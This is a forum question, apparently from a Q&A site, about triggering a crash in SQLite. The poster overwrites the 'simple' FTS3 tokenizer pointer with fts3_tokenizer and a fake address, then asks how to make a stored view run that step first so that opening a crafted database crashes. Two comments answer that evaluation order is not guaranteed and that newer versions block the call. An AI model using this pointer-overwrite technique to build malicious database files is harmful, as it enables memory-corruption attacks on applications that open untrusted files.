# How to ensure subquery execution order of sinlge VIEW in SQLITE3?

Tags: sqlite, exploit

While using sqlite3, I have encountered a strange case.

Firstly I create a database like this:

```
$ sqlite3 ./test.db
sqlite> CREATE VIRTUAL TABLE dummy USING fts3(tokenize=simple);
sqlite> CREATE VIEW testview AS SELECT(
   ...>     (SELECT fts3_tokenizer('simple', x'deadbeefdeadbeef')) +
   ...>     (SELECT * FROM dummy)
   ...> );
sqlite> .quit
```

Then I open it again.

```
$ sqlite3 ./test.db
sqlite> SELECT * FROM dummy;
sqlite> .quit
```

Of course nothing happens as dummy is an empty table.

I reclaim tokenizer 'simple' before it.

```
$ sqlite3 ./test.db
sqlite> SELECT fts3_tokenizer('simple', x'deadbeefdeadbeef');
sqlite> SELECT * FROM dummy;
[1]    33079 segmentation fault (core dumped)  ./sqlite3 test.db
```

It crashs, because I have changed the virtual table of tokenizer 'simple', and when I SELECT the table dummy the first time since sqlite start, sqlite will use fts3 xCREATE function to "recreate" the table.

Strange thing happens as I do this two things in the view, which is just created at the begining - testview.

```
$ sqlite3 ./test.db
sqlite> SELECT * FROM testview;
sqlite> .quit
```

Nothing happened. It seems as if the first subquery in testview is just executed after the second, which is counterintuitive. No matter how I change the order, "SELECT * FROM dummy" seems always executed at first.

So my question is, why does it preform like this, and, how can I ensure "SELECT fts3_tokenizer('simple', x'deadbeefdeadbeef');" happens before "SELECT * FROM dummy;", so I can trigger the crash.

Comment: While I have no idea what the query in that view is trying to accomplish (scalar subqueries like that with no order by just return a single random row and have to return a single column so `*` makes no sense), I'm pretty sure sqlite doesn't make any guarantee about the order of evaluation of arguments to a binary operator outside of normal precedence rules.

Comment: Plus trying to call `fts3_tokenizer('simple', x'deadbeefdeadbeef')` in any remotely modern version of sqlite3 raises an error. Needs to be used in a certain way through the C parameter binding API.